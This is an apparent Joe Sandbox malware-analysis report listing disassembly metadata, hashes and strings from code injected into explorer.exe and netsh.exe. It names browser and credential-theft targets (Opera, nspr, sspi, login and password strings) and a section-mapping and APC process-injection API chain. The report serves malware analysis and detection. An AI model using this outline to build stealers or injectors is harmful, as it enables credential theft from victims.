              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
              • API String ID: 0-355182820
              • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
              • Instruction ID: ffe0c434a4dd35cebdcfba224263d819f23d03c5c66f37bfd5d198172648431d
              • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
              • Instruction Fuzzy Hash: C0C15A70618B099FCB58EF28C485AEAF3E1FB94314F40472ED49AC7251DF34A656CB86
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .$0$c$n$r$r$r$r$r$r$r$r
              • API String ID: 0-97273177
              • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
              • Instruction ID: 5a7cc5cf9083a44fea710dd2336b38340a5a3d48884e7eb4c528b7d74da2ef83
              • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
              • Instruction Fuzzy Hash: B851F53111C7488FDB5ADF18D8812AAB7E5FBC5710F541A2EE8CBC7242DBB49546CB82
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
              • API String ID: 0-639201278
              • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
              • Instruction ID: 06b44c4bb1c1cd959940dd7233cc59426dd3ed01e114d825396b537dc8170bbf
              • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
              • Instruction Fuzzy Hash: 43C18370618B198FCB58FF68D495AEAB3E1FB94310F944329844EC7252DF38E942CB85
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
              • API String ID: 0-639201278
              • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
              • Instruction ID: cfb5e6a9a69e54a5c98ab7e25a3edfc8ca4acdabec51ec6bbeefd501e9ac82e1
              • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
              • Instruction Fuzzy Hash: B8C18370618B198FCB58FF68D495AEAB3E1FB94310F944329844ED7252DF38E942CB85
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: UR$2$L: $Pass$User$name$word
              • API String ID: 0-2058692283
              • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
              • Instruction ID: c3e6ec76c8b1c6d33d6faeb270108ec00100ad8efdc9828ccb7d721494753f6a
              • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
              • Instruction Fuzzy Hash: BBA18F7061C7488BDB19EFA894447EEB7E1FF88310F40462DE48AD7292EF749546C789
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: UR$2$L: $Pass$User$name$word
              • API String ID: 0-2058692283
              • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
              • Instruction ID: de983772bd34c9a4f7b3e98d53e1450c10d940adf379fd4433fc8aa8d0ab5464
              • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
              • Instruction Fuzzy Hash: 9E918F7061C7488BDB19EFA8D444BEEB7E1FB88310F40462DE48AD7292EB749546C785
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: $.$e$n$v
              • API String ID: 0-1849617553
              • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
              • Instruction ID: 775310e8caae77d328f77d85472131922b55e8b063324ccae162f17f1c3b7d41
              • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
              • Instruction Fuzzy Hash: 94719431618B498FDB58EF68C4847AAB7F1FF58314F00063ED44AC7262EB75E9468B85
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 2.dl$dll$l32.$ole3$shel
              • API String ID: 0-1970020201
              • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
              • Instruction ID: 4278a62081fd83035e4812e5d12533de23058d138ff64f3420b2f75880ec84d9
              • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
              • Instruction Fuzzy Hash: F55159B0918B4C8BDB65EFA4C045AEEB7E1FF58311F404A2ED49AE7214EF3495418B89
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 4$\$dll$ion.$vers
              • API String ID: 0-1610437797
              • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
              • Instruction ID: 8b5a9a763deffd397541b4f321b90c834a303f5193b08f74c2e285904e544407
              • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
              • Instruction Fuzzy Hash: FE416030218B898FDBB5EF2498457EAB3E4FBD8311F40462E989EC7241EF34D5458782
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: 32.d$cli.$dll$sspi$user
              • API String ID: 0-327345718
              • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
              • Instruction ID: b9ed73770f761e5d4940b07472d3a1079b9879c1bad2841b8f3ced65d155e839
              • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
              • Instruction Fuzzy Hash: F7416C70A18F0D8FCF58FF6880957AE73E5FB68314F40016AAC0ADB242DB39D5418B86
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .dll$el32$h$kern
              • API String ID: 0-4264704552
              • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
              • Instruction ID: f53b45ad9c47c24e78987253deb60089b07ec7e6536e218cad3c912f8811250f
              • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
              • Instruction Fuzzy Hash: AE417F70608B498FDBA9EF28C4843AAF7E1FBD8310F544A2E949EC3256DB74D545CB81
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: $Snif$f fr$om:
              • API String ID: 0-3434893486
              • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
              • Instruction ID: b1aaac9e98a329305b02bb264c5028370931d9572c99064ff74ef1d9e6c758e2
              • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
              • Instruction Fuzzy Hash: 7431E57151DB886FDB1AEB28C4846DAB7D4FB84310F50491EE49BC7292EE34E549CB43
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: $Snif$f fr$om:
              • API String ID: 0-3434893486
              • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
              • Instruction ID: 2571415e2061aa0a2b7759ab0921c0f14186ddeba53000e9f174b83c9e56717c
              • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
              • Instruction Fuzzy Hash: 1831F67151CB486FDB1AEB24C4846DAB7D4FB94310F40491EE49BC3396EE34E505CA43
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .dll$chro$hild$me_c
              • API String ID: 0-3136806129
              • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
              • Instruction ID: 244ebe2bc4c86b88c8f37cf01a3b0cdf7ab3cec77a8415b30c3f795d04d83edc
              • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
              • Instruction Fuzzy Hash: FB317C70118B088FCB84FF688494BAAB7E1FBD8210F84066D944ACB256DF38D946CB52
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .dll$chro$hild$me_c
              • API String ID: 0-3136806129
              • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
              • Instruction ID: 163ed50c44abdddd9a071c09e77aed505f5447691c4dc5b0913954c12c420ee5
              • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
              • Instruction Fuzzy Hash: 35317E70118B088FCB84EF689494BAAB7E1FFD8310F84466D944ACB256DF38D946CB52
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: User-Agent: $nt: $on.d$urlmon.dll
              • API String ID: 0-319646191
              • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
              • Instruction ID: d79f2ad573c2b478d02aa6556a86c294f3efb9a3d3693e76610857b5194787c4
              • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
              • Instruction Fuzzy Hash: 4B31DD71618B0C8BCF45EFA8C8847EEBBE1FB58224F40022AD45ED7241DF788645C799
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: User-Agent: $nt: $on.d$urlmon.dll
              • API String ID: 0-319646191
              • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
              • Instruction ID: cb33866186515f31afa5e73d96dc0253b46b7a15565edbc6eb47db3154aea5aa
              • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
              • Instruction Fuzzy Hash: 7621D270618B0C8BCF45EFA8C8847EDBBE1FF58224F40422AD45AD7251DF788645C799
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .$l$l$t
              • API String ID: 0-168566397
              • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
              • Instruction ID: b2114c97b751c5c67e01edf7f720f7508fbc8ba840d6e0c5f853faab5b78f38d
              • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
              • Instruction Fuzzy Hash: 3A217C70A28B0E9BDB48EFA8C0447AEBAF0FF58320F50562ED009D3641DB7895918B84
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: .$l$l$t
              • API String ID: 0-168566397
              • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
              • Instruction ID: ab63d009d3e7b8d9c081dc3c09cc5c66a9b2d0208726820cf612a571e7adbeb5
              • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
              • Instruction Fuzzy Hash: 5A216D74A28B0D9BDB48EFA8D0447EDBBF1FF58324F50562DD009D3641DB7895918B84
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4156759152.000000000F2A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F2A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_f2a0000_explorer.jbxd
              Similarity
              • API ID:
              • String ID: auth$logi$pass$user
              • API String ID: 0-2393853802
              • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
              • Instruction ID: 59643d719cff6d688666b3869df21be29fc48f3056a7fba5361f5a07cb66d676
              • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
              • Instruction Fuzzy Hash: 9F21C070628B0D8BCF05DF9998806EEB7E1EF88354F004619E44AEB345D7B4E9158BC2

              Execution Graph

Execution Coverage: 1.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 618
Total number of Limit Nodes: 77

execution_graph: [rendered graph node and edge data omitted; the API calls named on the graph nodes are LdrLoadDll, LdrInitializeThunk, Sleep, NtCreateFile, NtReadFile, NtClose, RtlAllocateHeap, RtlFreeHeap, LookupPrivilegeValueW, SetErrorMode, CreateProcessInternalW, NtQueryInformationProcess, NtSuspendThread, NtCreateSection and NtMapViewOfSection]
107263->107272 107265 bba531 107268 bba552 NtResumeThread 107265->107268 107266->107265 107267 bba4a6 NtSetContextThread 107266->107267 107271 bba4bd 107267->107271 107268->107269 107269->107251 107270 bba51c RtlQueueApcWow64Thread 107270->107265 107271->107265 107271->107270 107273 bb9bf7 107272->107273 107274 bb9c66 NtCreateSection 107273->107274 107275 bb9ca0 107274->107275 107277 bb9d4e 107274->107277 107276 bb9cc1 NtMapViewOfSection 107275->107276 107276->107277 107278 bb9d0c 107276->107278 107277->107266 107278->107277 107279 bb9d88 107278->107279 107280 bb9dc5 NtClose 107279->107280 107280->107266 107281->107262

              Control-flow Graph

              APIs
              • NtQueryInformationProcess.NTDLL ref: 00BBA19F
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141563978.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_bb0000_netsh.jbxd
              Similarity
              • API ID: InformationProcessQuery
              • String ID: 0
              • API String ID: 1778838933-4108050209
              • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
              • Instruction ID: 5a17ac47d4446cff0b0bf7587f414be0313039bc8971e61d5db43fc4cf346f7c
              • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
              • Instruction Fuzzy Hash: 01F15270918A4C8FDBA9EF68C894AEEB7E0FF98304F40466AE44ED7251DF749641CB41

              Control-flow Graph (image not reproduced; basic blocks bb9baf-bb9ddc, calling NtCreateSection, NtMapViewOfSection and NtClose)
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141563978.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_bb0000_netsh.jbxd
              Similarity
              • API ID: Section$CloseCreateView
              • String ID: @$@
              • API String ID: 1133238012-149943524
              • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
              • Instruction ID: 14666e09cb98f059f4ff8b3f78dd0c55145f00eab6fb0bc12c2dad947bdd40dc
              • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
              • Instruction Fuzzy Hash: 06619170218B088FCB58EF68D8856AABBE0FF98314F50062EE58AC3251DF75D441CB86

              Control-flow Graph (image not reproduced; basic blocks bb9bb2-bb9ddc, calling NtCreateSection, NtMapViewOfSection and NtClose)
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141563978.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_bb0000_netsh.jbxd
              Similarity
              • API ID: Section$CreateView
              • String ID: @$@
              • API String ID: 1585966358-149943524
              • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
              • Instruction ID: b11fb2c1858eb2ef02c575bbf3ee3d0d61f9491565a7070e94a1793e8506bde2
              • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
              • Instruction Fuzzy Hash: 0B518E70618B088FDB58DF18D885AAABBE0FB98314F50062EF98AC3651DF75D441CB86

              Control-flow Graph

              APIs
              • NtQueryInformationProcess.NTDLL ref: 00BBA19F
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4141563978.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_bb0000_netsh.jbxd
              Similarity
              • API ID: InformationProcessQuery
              • String ID: 0
              • API String ID: 1778838933-4108050209
              • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
              • Instruction ID: fff8ee8f2a6ea9535e6d41e91ce26b309383cf80f88952f39e9a3138b581d12b
              • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
              • Instruction Fuzzy Hash: 60515D70918A8C8FDBA9EF68C8846EEBBF4FB98305F40422ED44AD7211DF709645CB41

              Control-flow Graph (image not reproduced; basic blocks 41a35f-41a3b1, calling 41af60 then NtCreateFile)
              APIs
              • NtCreateFile.NTDLL(00000060,00000000,.z`,00414BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00414BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0041A3AD
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID: .z`
              • API String ID: 823142352-1441809116
              • Opcode ID: fed1d1309162db8d0a747d187bc6f9ad4c96d1cc1fdd8183c8b47b824c70450f
              • Instruction ID: b0ea305ca0179594be26f88849999d72c403b9e7c25092e2012cfb502ab0554f
              • Opcode Fuzzy Hash: fed1d1309162db8d0a747d187bc6f9ad4c96d1cc1fdd8183c8b47b824c70450f
              • Instruction Fuzzy Hash: FEF0BDB2205208AFCB48CF88DC85EEB37EDAF8C754F158248BA0DD7241D630E8518BA4

              Control-flow Graph (image not reproduced; basic blocks 41a360-41a3b1, calling 41af60 then NtCreateFile)
              APIs
              • NtCreateFile.NTDLL(00000060,00000000,.z`,00414BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00414BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0041A3AD
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID: .z`
              • API String ID: 823142352-1441809116
              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
              • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
              • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

              Control-flow Graph (image not reproduced; basic blocks 41a40a-41a459, calling 41af60 then NtReadFile)
              APIs
              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1JA,FFFFFFFF,?,rMA,?,00000000), ref: 0041A455
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: 1JA
              • API String ID: 2738559852-3517284412
              • Opcode ID: a7d9e67bc0a7f934f25e98d71784c61da8d6ac106cdc2fb5df1c2e41c41e999a
              • Instruction ID: d9f3efcc6fba735fe827f6fd57d323a72c1d16cfd7affead5f3e42ca52de0d7b
              • Opcode Fuzzy Hash: a7d9e67bc0a7f934f25e98d71784c61da8d6ac106cdc2fb5df1c2e41c41e999a
              • Instruction Fuzzy Hash: 81F0A9B2200208AFCB14DF99DC81DEB77A9EF8C754F158249BA1DA7241D634E951CBE4

              Control-flow Graph (image not reproduced; basic blocks 41a410-41a459, calling 41af60 then NtReadFile)
              APIs
              • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1JA,FFFFFFFF,?,rMA,?,00000000), ref: 0041A455
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID: 1JA
              • API String ID: 2738559852-3517284412
              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
              • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
              • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
              APIs
              • NtClose.NTDLL(PMA,?,?,00414D50,00000000,FFFFFFFF), ref: 0041A4B5
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID: PMA
              • API String ID: 3535843008-3622942700
              • Opcode ID: 6866c63e7f77f1cf9f4179088a192caf9762c1937d793d073a03901159387ab9
              • Instruction ID: eea82b31076ec0d138028a2a42476fb395de81841b37d259ef3cf74a12bfe863
              • Opcode Fuzzy Hash: 6866c63e7f77f1cf9f4179088a192caf9762c1937d793d073a03901159387ab9
              • Instruction Fuzzy Hash: 93E086712001147FD711DFA8DC45EE73B6CEF88730F244559B91D97291D130E6118790
              APIs
              • NtClose.NTDLL(PMA,?,?,00414D50,00000000,FFFFFFFF), ref: 0041A4B5
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_400000_netsh.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID: PMA
              • API String ID: 3535843008-3622942700
              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
              • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
              • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 4be22ec3e1fc31eca0e1a459f615abd0ab95e78ebfb9a13994c7ebccd56749bf
              • Instruction ID: 7af77ddad12162e02e4ba321ec78eeb8ea7ff21d4ccaa1923c63211a8aa14c91
              • Opcode Fuzzy Hash: 4be22ec3e1fc31eca0e1a459f615abd0ab95e78ebfb9a13994c7ebccd56749bf
              • Instruction Fuzzy Hash: 76900265711400030305B5980704507004687D6351355C032F5015660CDA2189616131
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
              • Associated: 00000006.00000002.4141713015.0000000000E49000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000E4D000.00000040.00001000.00020000.00000000.sdmp
              • Associated: 00000006.00000002.4141713015.0000000000EBE000.00000040.00001000.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_d20000_netsh.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 4efdfa5da2537f61c8238ba322e23a2636802e8eb6ff5d22da937d8b8d624e7f
              • Instruction ID: 176f7b0660fff39f2cc03aff0d58a4c211ff44cc1d8f485bf0dce2796f979a52
              • Opcode Fuzzy Hash: 4efdfa5da2537f61c8238ba322e23a2636802e8eb6ff5d22da937d8b8d624e7f
              • Instruction Fuzzy Hash: C39002A170240003430571984414616400A87E1301B55C032E50146A0DC92589917135
              APIs
              Memory Dump Source
              • Source File: 00000006.00000002.4141713015.0000000000D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D20000, based on PE: true
